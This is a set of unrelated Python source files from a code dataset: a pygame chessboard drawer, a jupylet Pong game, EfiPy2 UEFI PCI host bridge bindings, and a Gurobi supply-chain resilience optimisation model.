query\n","repo_name":"golmschenk/ramjet","sub_path":"src/ramjet/photometric_database/derived/tess_ffi_eclipsing_binary_light_curve_collection.py","file_name":"tess_ffi_eclipsing_binary_light_curve_collection.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"}
{"seq_id":"37054772713","text":"##################################################\n##################################################\n# The class is for establishing a chess game\n#\n##################################################\n##################################################\nclass Board:\n    \n    def __init__(self):\n        self.board_length = 800\n        self.pygame = None\n\n    ##################################################\n    # Method for drawing the chess board\n    ##################################################\n    def DrawChessBoard(self, board_length = 800):\n        \n        import pygame\n\n        pygame.init()\n\n        # Setting up color objects\n        Colour = (100,120,10)\n        BLACK = (0, 0, 0)\n        WHITE = (255, 255, 255)\n\n        # Setup a board_length x board_length pixel display with caption\n        ChessBoard = pygame.display.set_mode((board_length,board_length))\n        ChessBoard.fill(WHITE)\n        pygame.display.set_caption(\"CHESS\")\n\n\n        # create board squares\n        exact_board_length = board_length\n        board_length = exact_board_length - (exact_board_length/ (8 + 1))\n        square_length = board_length/ (8 + 1)\n        square_position1 = square_length\n        square_position2 = square_length\n        count = 0\n        position_names = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\"]\n        \n        ####################\n        # draw the frame of the board\n        pygame.draw.rect(ChessBoard, BLACK, \n                        [square_length, square_length, \n                        board_length - square_length, board_length - square_length], width = 4, \n                        border_radius=2,border_top_left_radius=-1, border_top_right_radius=-1,\n                        border_bottom_left_radius=-1, border_bottom_right_radius=-1)\n        \n
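        # Geometry note: with the default 800 px window, board_length becomes\n        # 800 - 800/9 (about 711 px) and square_length about 79 px, i.e. nine\n        # grid steps (eight squares plus the coordinate-label margin) per side.\n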
        ########################################\n        #draw the position name and the squares of the chessboard\n        while square_position1 < (board_length):\n            from pygame import font\n            square_position2 = square_length\n            if count%2 == 0:\n                square_position2 = square_length*2\n            count = count + 1\n            \n            ####################\n            ### draw the position name\n            font = pygame.font.SysFont(\"comicsansms\", int(square_length/4))\n            text1 = font.render(str(count), True, BLACK)\n            text2 = font.render(position_names[count-1], True, BLACK)\n            ChessBoard.blit(text1,(0 + square_length/4 , square_position1 + square_length/4))\n            pygame.display.flip()\n            ChessBoard.blit(text2,(square_position1 + square_length/4 , 0 + square_length/4))\n            \n            ####################\n            ### draw the squares of the chessboard\n            while square_position2 < (board_length):\n                pygame.draw.rect(ChessBoard, BLACK, \n                                [square_position1, square_position2, square_length, square_length], \n                                border_radius=2,border_top_left_radius=-1, border_top_right_radius=-1,\n                                border_bottom_left_radius=-1, border_bottom_right_radius=-1)\n                square_position2 = square_position2 + square_length*2\n            ####################\n            square_position1 = square_position1 + square_length\n        self.pygame = pygame\n        \n    ##################################################\n    # Draw Chess Pieces\n    ##################################################\n    def DrawChessPieces(self ):\n        pygame = self.pygame\n        #TODO\n        \n\n    \n    ##################################################\n    # Method for running the established pygame loop\n    ##################################################\n    def RunGame(self):\n        from pygame.locals import QUIT\n        import sys\n        \n        pygame = self.pygame\n        # Assign FPS a value\n        fps = 30\n        FramePerSec = pygame.time.Clock()\n        \n        # Beginning Game Loop\n        while True:\n            pygame.display.update()\n            for event in pygame.event.get():\n                if event.type == QUIT:\n                    pygame.quit()\n                    sys.exit()\n\n            FramePerSec.tick(fps)","repo_name":"MelikeSila/chess","sub_path":"ChessEquipment.py","file_name":"ChessEquipment.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"}
{"seq_id":"19513928389","text":"import math\nimport time\nimport sys\nimport os\n\nimport PIL.Image\n\nimport numpy as np\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nimport jupylet.color\n\nfrom jupylet.app import App\nfrom jupylet.state import State\nfrom jupylet.label import Label\nfrom jupylet.sprite import Sprite\n\nfrom jupylet.audio.sample import Sample\n\nimport moderngl_window.timers.clock as _clock\n\n\napp = App()\n\n\nbackground = '#3e32a2'\nforeground = '#7c71da'\n\n\na0 = np.ones((32, 32)) * 255\na1 = np.ones((128, 16)) * 255\na2 = np.ones((app.height * 9 // 10, app.width * 9 // 10, 3)) * 255\n\nball = Sprite(a0, y=app.height/2, x=app.width/2)\n\npadl = Sprite(a1, y=app.height/2, x=48)\npadr = Sprite(a1, y=app.height/2, x=app.width-48)\n\nfield = Sprite(a2, y=app.height/2, x=app.width/2, color=background) \n\npong_sound = Sample('sounds/pong-blip.wav', amp=0.2).load()\n\n\nscorel = Label(\n    '0', font_size=42, color=foreground, \n    x=64, y=app.height/2, \n    anchor_y='center', anchor_x='left',\n    font_path='fonts/PetMe64.ttf'\n)\n\nscorer = Label(\n    '0', font_size=42, color=foreground, \n    x=app.width-64, y=app.height/2, \n    anchor_y='center', anchor_x='right',\n    font_path='fonts/PetMe64.ttf'\n)\n\n\n@app.event\ndef render(ct, dt):\n    \n    app.window.clear(color=foreground)\n    \n    field.draw()\n    \n    scorel.draw()\n    scorer.draw()\n    \n    ball.draw()\n    padl.draw()\n    padr.draw()\n\n\nstate = State(\n    \n    
sl = 0,\n sr = 0,\n \n bvx = 192,\n bvy = 192,\n \n vyl = 0,\n pyl = app.height/2,\n\n vyr = 0,\n pyr = app.height/2,\n\n left = False,\n right = False,\n\n key_a = False,\n key_d = False,\n)\n\n\n@app.event\ndef key_event(key, action, modifiers):\n \n keys = app.window.keys\n \n if action == keys.ACTION_PRESS:\n \n if key == keys.LEFT:\n state.left = True\n\n if key == keys.RIGHT:\n state.right = True\n\n if key == keys.A:\n state.key_a = True\n\n if key == keys.D:\n state.key_d = True\n\n if action == keys.ACTION_RELEASE:\n\n \n if key == keys.LEFT:\n state.left = False\n\n if key == keys.RIGHT:\n state.right = False\n\n if key == keys.A:\n state.key_a = False\n\n if key == keys.D:\n state.key_d = False\n\n\n@app.run_me_every(1/120)\ndef update_pads(ct, dt):\n \n if state.right:\n state.pyr = min(app.height, state.pyr + dt * 512)\n \n if state.left:\n state.pyr = max(0, state.pyr - dt * 512)\n \n if state.key_a:\n state.pyl = min(app.height, state.pyl + dt * 512)\n \n if state.key_d:\n state.pyl = max(0, state.pyl - dt * 512)\n \n ayl = 200 * (state.pyl - padl.y)\n ayr = 200 * (state.pyr - padr.y)\n\n state.vyl = state.vyl * 0.9 + (ayl * dt)\n state.vyr = state.vyr * 0.9 + (ayr * dt)\n \n padl.y += state.vyl * dt\n padr.y += state.vyr * dt\n \n padr.clip_position(app.width, app.height)\n padl.clip_position(app.width, app.height)\n\n\n@app.run_me_every(1/60)\ndef update_ball(ct, dt):\n \n bs0 = state.bvx ** 2 + state.bvy ** 2\n \n ball.angle += 200 * dt\n \n ball.x += state.bvx * dt\n ball.y += state.bvy * dt\n \n if ball.top >= app.height:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.y -= ball.top - app.height\n state.bvy = -state.bvy\n \n if ball.bottom <= 0:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.y -= ball.bottom\n state.bvy = -state.bvy\n \n if ball.right >= app.width:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.x -= ball.right - app.width\n \n state.bvx = -192\n state.bvy = 192 * np.sign(state.bvy)\n bs0 = 0\n \n state.sl += 1\n scorel.text = str(state.sl)\n \n if ball.left <= 0:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.x -= ball.left\n \n state.bvx = 192\n state.bvy = 192 * np.sign(state.bvy)\n bs0 = 0\n \n state.sr += 1\n scorer.text = str(state.sr)\n \n if state.bvx > 0 and ball.top >= padr.bottom and padr.top >= ball.bottom: \n if 0 < ball.right - padr.left < 10:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.x -= ball.right - padr.left\n state.bvx = -state.bvx\n state.bvy += state.vyr / 2\n \n if state.bvx < 0 and ball.top >= padl.bottom and padl.top >= ball.bottom: \n if 0 < padl.right - ball.left < 10:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.x += ball.left - padl.right\n state.bvx = -state.bvx\n state.bvy += state.vyl / 2\n \n bs1 = state.bvx ** 2 + state.bvy ** 2\n \n if bs1 < 0.9 * bs0:\n state.bvx = (bs0 - state.bvy ** 2) ** 0.5 * np.sign(state.bvx)\n\n ball.wrap_position(app.width, app.height)\n\n\n@app.run_me()\ndef highlights(ct, dt):\n \n sl0 = state.sl\n sr0 = state.sr\n \n slc = np.array(scorel.color)\n src = np.array(scorer.color)\n \n while True:\n \n ct, dt = yield 1/24\n \n r0 = 0.9 ** (120 * dt)\n \n scorel.color = np.array(scorel.color) * r0 + (1 - r0) * slc\n scorer.color = np.array(scorer.color) * r0 + (1 - r0) * src\n \n if sl0 != state.sl:\n sl0 = state.sl\n scorel.color = 'white'\n\n if sr0 != state.sr:\n sr0 = state.sr\n scorer.color = 'white'\n\n\ndef step(player0=[0, 0, 0, 0, 
0], player1=[0, 0, 0, 0, 0], n=1):\n \n state.key_a, state.key_d = player0[:2]\n \n state.left, state.right = player1[:2]\n \n sl0 = state.sl\n sr0 = state.sr\n \n if app.mode == 'hidden': \n app.step(n)\n \n reward = (state.sl - sl0) - (state.sr - sr0)\n\n return observe(reward)\n\n\ndef observe(reward=0):\n\n return {\n 'screen0': app.observe(),\n 'player0': {'score': state.sl, 'reward': reward},\n 'player1': {'score': state.sr, 'reward': -reward},\n }\n\n\nSTART = 'pong-start.state'\n\n\ndef reset():\n load(START)\n return observe()\n \n \ndef load(path):\n app.load_state(path, state, ball, padl, padr, scorel, scorer)\n return observe()\n \n\ndef save(path=None):\n app.save_state('pong', path, state, ball, padl, padr, scorel, scorer)\n\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"nir/jupylet","sub_path":"examples/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":6484,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"51"} +{"seq_id":"38623726047","text":"from EfiPy2 import *\n\nfrom EfiPy2.MdePkg.Protocol.PciRootBridgeIo import EFI_PCI_ROOT_BRIDGE_IO_PROTOCOL_PCI_ADDRESS\n\ngEfiPciHostBridgeResourceAllocationProtocolGuid = \\\n EFI_GUID (0xCF8034BE, 0x6768, 0x4d8b, (0xB7,0x39,0x7C,0xCE,0x68,0x3A,0x9F,0xBE ))\n\nclass EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL (Structure):\n pass\n\nEFI_PCI_HOST_BRIDGE_COMBINE_MEM_PMEM = 1\nEFI_PCI_HOST_BRIDGE_MEM64_DECODE = 2\n\nEFI_RESOURCE_ALLOCATION_STATUS = UINT64\n\nEFI_RESOURCE_SATISFIED = 0x0000000000000000\nEFI_RESOURCE_NOT_SATISFIED = 0xFFFFFFFFFFFFFFFF\n\nEfiPciHostBridgeBeginEnumeration = 0\nEfiPciHostBridgeBeginBusAllocation = 1\nEfiPciHostBridgeEndBusAllocation = 2\nEfiPciHostBridgeBeginResourceAllocation = 3\nEfiPciHostBridgeAllocateResources = 4\nEfiPciHostBridgeSetResources = 5\nEfiPciHostBridgeFreeResources = 6\nEfiPciHostBridgeEndResourceAllocation = 7\nEfiPciHostBridgeEndEnumeration = 8\nEfiMaxPciHostBridgeEnumerationPhase = 9\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PHASE = ENUM\n\nEfiPciBeforeChildBusEnumeration = 0\nEfiPciBeforeResourceCollection = 1\nEFI_PCI_CONTROLLER_RESOURCE_ALLOCATION_PHASE = ENUM\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_NOTIFY_PHASE = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL),# IN *This\n EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PHASE # IN Phase\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_NEXT_ROOT_BRIDGE = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This\n POINTER(EFI_HANDLE) # IN OUT *RootBridgeHandle\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_ATTRIBUTES = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n POINTER(UINT64) # OUT *Attributes\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_START_BUS_ENUMERATION = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n POINTER(PVOID) # OUT **Configuration\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_SET_BUS_NUMBERS = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n PVOID # IN *Configuration\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_SUBMIT_RESOURCES = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, 
# IN RootBridgeHandle,\n PVOID # IN *Configuration\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_PROPOSED_RESOURCES = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n POINTER(PVOID) # OUT **Configuration\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_PREPROCESS_CONTROLLER = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n EFI_PCI_ROOT_BRIDGE_IO_PROTOCOL_PCI_ADDRESS, # IN PciAddress,\n EFI_PCI_CONTROLLER_RESOURCE_ALLOCATION_PHASE # IN Phase\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL._fields_ = [\n (\"NotifyPhase\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_NOTIFY_PHASE),\n (\"GetNextRootBridge\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_NEXT_ROOT_BRIDGE),\n (\"GetAllocAttributes\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_ATTRIBUTES),\n (\"StartBusEnumeration\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_START_BUS_ENUMERATION),\n (\"SetBusNumbers\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_SET_BUS_NUMBERS),\n (\"SubmitResources\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_SUBMIT_RESOURCES),\n (\"GetProposedResources\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_PROPOSED_RESOURCES),\n (\"PreprocessController\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_PREPROCESS_CONTROLLER)\n ]\n\n","repo_name":"EfiPy/EfiPy2","sub_path":"Efi/StdLib/lib/python36.8/EfiPy2/MdePkg/Protocol/PciHostBridgeResourceAllocation.py","file_name":"PciHostBridgeResourceAllocation.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"28062907139","text":"import math\nimport time\nimport numpy as np\nimport random\nfrom random import randint\nfrom gurobipy import *\nimport pandas as pd\nfrom random import seed\nimport matplotlib.pyplot as plt\nimport itertools\nimport ast\n\n# Read input files\npath = \"/home/dkabe/SC_Resilience/Input_Data/Realistic/\"\np_failure = 0.1\np_running = 1 - p_failure\ninstances = 2\nnum_samples = 200\nProducts = [3,3]\n\nManufacturing_plants = [6, 6]\nDistribution = [4, 4]\nMarket = [29, 29]\nnumScenarios = [192, 192]\n\n# Read and append input files\nf_i = [None]*instances\nf_j = [None]*instances\nvolume = [None]*instances\nManufacturing_costs = [None]*instances\nTransportation_i_j = [None]*instances\nTransportation_j_k = [None]*instances\nCapacities_i = [None]*instances\nCapacities_j = [None]*instances\nlost_sales = [None]*instances\ndemand = [None]*instances\n\nfor instance in range(instances):\n # Cost of Opening\n f_i[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/OpenMP_' + str(instance + 1) + '.txt')\n f_j[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/OpenDC_' + str(instance + 1) + '.txt')\n\n # Unit cost of Manufacturing\n Manufacturing_costs[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/Manufacturing_' + str(instance + 1) + '.txt')\n\n # Transportation Costs\n Transportation_i_j[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/TransMPDC_' + str(instance + 1) + '.txt').reshape((Products[instance], Manufacturing_plants[instance], Distribution[instance]))\n Transportation_j_k[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/TransDCMZ_' + str(instance + 1) + '.txt').reshape((Products[instance], Distribution[instance], 
Market[instance]))\n\n # Plant Capacities\n Capacities_i[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/CapacitiesMP_' + str(instance + 1) + '.txt')\n Capacities_j[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/CapacitiesDC_' + str(instance + 1) + '.txt')\n\n # Unit cost of lost sales\n lost_sales[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/LostSales_' + str(instance + 1) + '.txt').reshape((Market[instance], Products[instance]))\n\n # demand\n demand[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/Demand_' + str(instance + 1) + '.txt').reshape((numScenarios[instance], Products[instance], Market[instance]))\n\n # volume\n volume[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/Volume_' + str(instance + 1) + '.txt')\n\nScenarios = []\n\nfor instance in range(instances):\n text_file = open(path + 'Instance_' + str(instance + 1) + '/scen_' + str(instance + 1) + '.txt', \"r\")\n ls = text_file.read().split('\\n')[:-1]\n Scen = list(map(lambda x: ast.literal_eval(x), ls))\n Scenarios.append(Scen)\n\n\n# Initialize model variables\n\nx_i = {} # opening manufacturing plant\nx_j = {} # opening DC\nU_km = {} # quantity lost sales\nQ_im = {} # quantity produced\nY_ijm = {} # shipping i -> j\nZ_jkm = {} # shipping j -> k\nw_s = {} # penalty for not meeting demand above specified rate\n\n# Dictionaries for analysis\nCost_dict = {}\nSummary_dict = {}\n\n# Dictionary to weigh different objectives\nobjWeights = {}\n\n# Dictionary to save values of each objectives\ndic_grbOut = {}\n\ngrbModel = Model()\n\ndef SetGurobiModel(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products):\n\n global x_i \n global x_j \n global U_km \n global Q_im \n global Y_ijm \n global Z_jkm \n global w_s \n\n x_i = grbModel.addVars(range(Manufacturing_plants), vtype = GRB.BINARY)\n x_j = grbModel.addVars(range(Distribution), vtype = GRB.BINARY) \n U_km = grbModel.addVars(range(num_Scenarios), range(Market), range(Products), vtype = GRB.CONTINUOUS) \n Q_im = grbModel.addVars(range(num_Scenarios), range(Products), range(Manufacturing_plants), vtype = GRB.CONTINUOUS)\n Y_ijm = grbModel.addVars(range(num_Scenarios), range(Products), range(Manufacturing_plants), range(Distribution), vtype = GRB.CONTINUOUS)\n Z_jkm = grbModel.addVars(range(num_Scenarios), range(Products), range(Distribution), range(Market), vtype = GRB.CONTINUOUS)\n w_s = grbModel.addVars(range(num_Scenarios), range(Market), range(Products), vtype = GRB.CONTINUOUS)\n \n\n SetGrb_Obj(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products)\n ModelCons(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products)\n\ndef SolveModel(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products):\n grbModel.params.OutputFlag = 0\n grbModel.params.timelimit = 900\n start_time = time.time()\n grbModel.optimize()\n #gap = grbModel.MIPGAP\n # get variable values\n v_val_x_i = grbModel.getAttr('x', x_i)\n v_val_x_j = grbModel.getAttr('x', x_j)\n v_val_U_km = grbModel.getAttr('x', U_km) \n v_val_Q_im = grbModel.getAttr('x', Q_im)\n v_val_Y_ijm = grbModel.getAttr('x', Y_ijm)\n v_val_Z_jkm = grbModel.getAttr('x', Z_jkm) \n v_val_w = grbModel.getAttr('x', w_s)\n\n Summary_dict['ObjVal'] = np.round(grbModel.objval,2)\n Summary_dict[\"OpenMPs\"] = np.sum(v_val_x_i.values())\n Summary_dict[\"OpenDCs\"] = np.sum(v_val_x_j.values())\n Cost_dict[\"Opening\"] = get_opening_costs(instance, v_val_x_i, 
v_val_x_j, Manufacturing_plants, Distribution)\n Cost_dict[\"f4\"] = np.round(get_rl_rate(v_val_w, instance, num_Scenarios, Market, Products), 2)\n\n for s in range(num_Scenarios):\n Summary_dict[\"Production_\" + str(s)] = sum([v_val_Q_im[(s,m,i)] for m in range(Products) for i in range(Manufacturing_plants)])\n Summary_dict[\"LostSales_\" + str(s)] = sum([v_val_U_km[(s,k,m)] for m in range(Products) for k in range(Market)])\n\n for s in range(num_Scenarios):\n Cost_dict[\"InHouseShipping_\" + str(s)] = get_shipping_costs(instance, s, v_val_Y_ijm, v_val_Z_jkm, Manufacturing_plants, Distribution, Products, Market)\n Cost_dict[\"Production_\" + str(s)] = get_production_cost(instance, s,v_val_Q_im, Manufacturing_plants, Products)\n Cost_dict[\"LostSales_\" + str(s)] = get_lost_cost(instance, s,v_val_U_km, Market, Products) \n\n f1_cost = 0\n f3_cost = 0\n for s in range(num_Scenarios):\n f1_cost += (Cost_dict['Production_' + str(s)] + Cost_dict['InHouseShipping_' + str(s)])\n f3_cost += Cost_dict['LostSales_' + str(s)]\n Cost_dict[\"f1\"] = np.round(Cost_dict[\"Opening\"] + f1_cost/num_Scenarios, 2) # in house (opening + production + shipping)\n Cost_dict[\"f3\"] = np.round(f3_cost/num_Scenarios, 2) # lost sales\n Summary_dict['Demand_met'] = np.mean([(Summary_dict[\"Production_\" + str(s)])/np.sum(demand[instance][s]) for s in range(num_Scenarios)])\n\n\n #print(\"obj val: \", Summary_dict['ObjVal'])\n #print(\"Opening Decisions: \", sum(v_val_x_i.values()), sum(v_val_x_j.values()))\n #print('In house Cost: ', Cost_dict[\"f1\"])\n #print('Lost Sales: ', Cost_dict[\"f3\"])\n #print('Demand Penalties: ', Cost_dict[\"f4\"])\n #print('Demand being met: ', Summary_dict['Demand_met'])\n #print('Gap: ', gap)\n \n return\n\n# Objective\n\ndef SetGrb_Obj(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products):\n grb_expr = LinExpr()\n\n # Cost of opening\n OC_1 = 0\n OC_2 = 0\n for i in range(Manufacturing_plants):\n OC_1 += f_i[instance][i]*x_i[i]\n for j in range(Distribution):\n OC_2 += f_j[instance][j]*x_j[j]\n\n total_shipment = 0\n total_pr_cost = 0\n total_l_cost = 0\n\n # Shipment\n\n for s in range(num_Scenarios):\n ship_1 = 0\n ship_2 = 0\n for i in range(Manufacturing_plants):\n for j in range(Distribution):\n for m in range(Products):\n ship_1 += Transportation_i_j[instance][m][i][j]*Y_ijm[s,m,i,j]\n\n for j in range(Distribution):\n for k in range(Market):\n for m in range(Products):\n ship_2 += Transportation_j_k[instance][m][j][k]*Z_jkm[s,m,j,k]\n \n total_shipment += (ship_1 + ship_2)\n\n # Production\n pr_cost = 0\n for i in range(Manufacturing_plants):\n for m in range(Products):\n pr_cost += Manufacturing_costs[instance][i][m]*Q_im[s,m,i]\n\n total_pr_cost += pr_cost \n\n #Lost Sales\n l_cost = 0\n for k in range(Market):\n for m in range(Products):\n l_cost += lost_sales[instance][k][m]*U_km[s,k,m]\n\n total_l_cost += l_cost\n\n # Percentage of demand met\n rl_penalty = 0\n for s in range(num_Scenarios):\n for k in range(Market):\n for m in range(Products):\n rl_penalty += lost_sales[instance][k][m]*w_s[s,k,m]*demand[instance][s][m][k]\n\n grb_expr += objWeights['f1']*(OC_1 + OC_2 + (total_shipment + total_pr_cost + total_l_cost)/num_Scenarios) + objWeights['f2']*rl_penalty/num_Scenarios\n\n grbModel.setObjective(grb_expr, GRB.MINIMIZE)\n\n return\n\n # Model Constraints\n\ndef ModelCons(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products):\n\n # Network Flow\n\n grbModel.addConstrs(Q_im[s,m,i] >= quicksum(Y_ijm[s,m,i,j] 
for j in range(Distribution))\n                        for s in range(num_Scenarios) for i in range(Manufacturing_plants) for m in range(Products))\n\n    grbModel.addConstrs(quicksum(Y_ijm[s,m,i,j] for i in range(Manufacturing_plants)) >= quicksum(Z_jkm[s,m,j,k] for k in range(Market))\n                        for s in range(num_Scenarios) for j in range(Distribution) for m in range(Products))\n\n    grbModel.addConstrs(quicksum(Z_jkm[s,m,j,k] for j in range(Distribution)) + \n                        U_km[s,k,m] >= demand[instance][s][m][k] for s in range(num_Scenarios) for m in range(Products)\n                        for k in range(Market)) \n\n    # Capacity Constraints\n    grbModel.addConstrs(quicksum(volume[instance][m]*Q_im[s,m,i] for m in range(Products)) <= Scenarios[instance][s][0][i]*Capacities_i[instance][i]*x_i[i]\n                        for s in range(num_Scenarios) for i in range(Manufacturing_plants))\n\n    grbModel.addConstrs(quicksum(volume[instance][m]*Y_ijm[s,m,i,j] for i in range(Manufacturing_plants) for m in range(Products)) <=\n                        Scenarios[instance][s][1][j]*Capacities_j[instance][j]*x_j[j] for s in range(num_Scenarios) for j in range(Distribution)) \n\n    # Resilience metric: w_s measures how far the met-demand fraction falls below rl\n    grbModel.addConstrs(w_s[s,k,m] >= rl - (1 - U_km[s,k,m]/demand[instance][s][m][k]) for s in range(num_Scenarios) for k in range(Market) for m in range(Products))\n\n    return\n\ndef get_opening_costs(instance, x1, x2, Manufacturing_plants, Distribution):\n\n    # Cost of opening\n    OC_1 = 0\n    OC_2 = 0\n    for i in range(Manufacturing_plants):\n        OC_1 += f_i[instance][i]*x1[i]\n    for j in range(Distribution):\n        OC_2 += f_j[instance][j]*x2[j]\n\n    Opening = np.round(OC_1 + OC_2)\n\n    return(Opening)\n\ndef get_shipping_costs(instance, scen, Y, Z, Manufacturing_plants, Distribution, Products, Market):\n    ship_1 = 0\n    ship_2 = 0 \n\n    # Shipment\n    for i in range(Manufacturing_plants):\n        for j in range(Distribution):\n            for m in range(Products):\n                ship_1 += Transportation_i_j[instance][m][i][j]*Y[scen, m,i,j]\n\n    for j in range(Distribution):\n        for k in range(Market):\n            for m in range(Products):\n                ship_2 += Transportation_j_k[instance][m][j][k]*Z[scen,m,j,k] \n\n    in_house_shipping = np.round(ship_1 + ship_2)\n\n    return(in_house_shipping)\n\ndef get_production_cost(instance, scen, Q, Manufacturing_plants, Products):\n\n    # Production\n    pr_cost = 0\n    for i in range(Manufacturing_plants):\n        for m in range(Products):\n            pr_cost += Manufacturing_costs[instance][i][m]*Q[scen,m,i]\n\n    return(np.round(pr_cost))\n\n\ndef get_lost_cost(instance, scen, U, Market, Products):\n\n    # Lost sales\n    l_cost = 0\n    for k in range(Market):\n        for m in range(Products):\n            l_cost += lost_sales[instance][k][m]*U[scen,k,m]\n\n    return(np.round(l_cost))\n\n\ndef get_rl_rate(w, instance, num_Scenarios, Market, Products):\n    rl_penalty = 0\n    for s in range(num_Scenarios):\n        for k in range(Market):\n            for m in range(Products):\n                rl_penalty += lost_sales[instance][k][m]*w[s,k,m]*demand[instance][s][m][k]\n\n    return(rl_penalty/num_Scenarios)\n\ndef PrintToFileSummaryResults(rl):\n    results_file = \"/home/dkabe/SC_Resilience/Output/results2.txt\"\n    ff = open(results_file, \"a\")\n    ff.write(str(rl) + '\\t')\n    ff.write(str(Summary_dict['ObjVal']) + '\\t' + str(Cost_dict['f1']) + '\\t' + str(Cost_dict['f3']) + '\\t' + str(Cost_dict['f4']) + '\\t')\n    ff.write(str(Summary_dict['Demand_met']) + '\\t')\n    ff.write(str(Summary_dict['OpenMPs']) + '\\t' + str(Summary_dict['OpenDCs']) + '\\t')\n    ff.write('\\n')\n    ff.close()\n    return\n\n\n
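# Usage sketch, using only names defined above: run_Model(0.9) solves the\n# default instance (192 scenarios) with a 90% service target. The w_s variables\n# then price any shortfall above it, e.g. losing 20% of a demand cell with\n# rl = 0.9 gives w >= 0.9 - (1 - 0.2) = 0.1.\n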
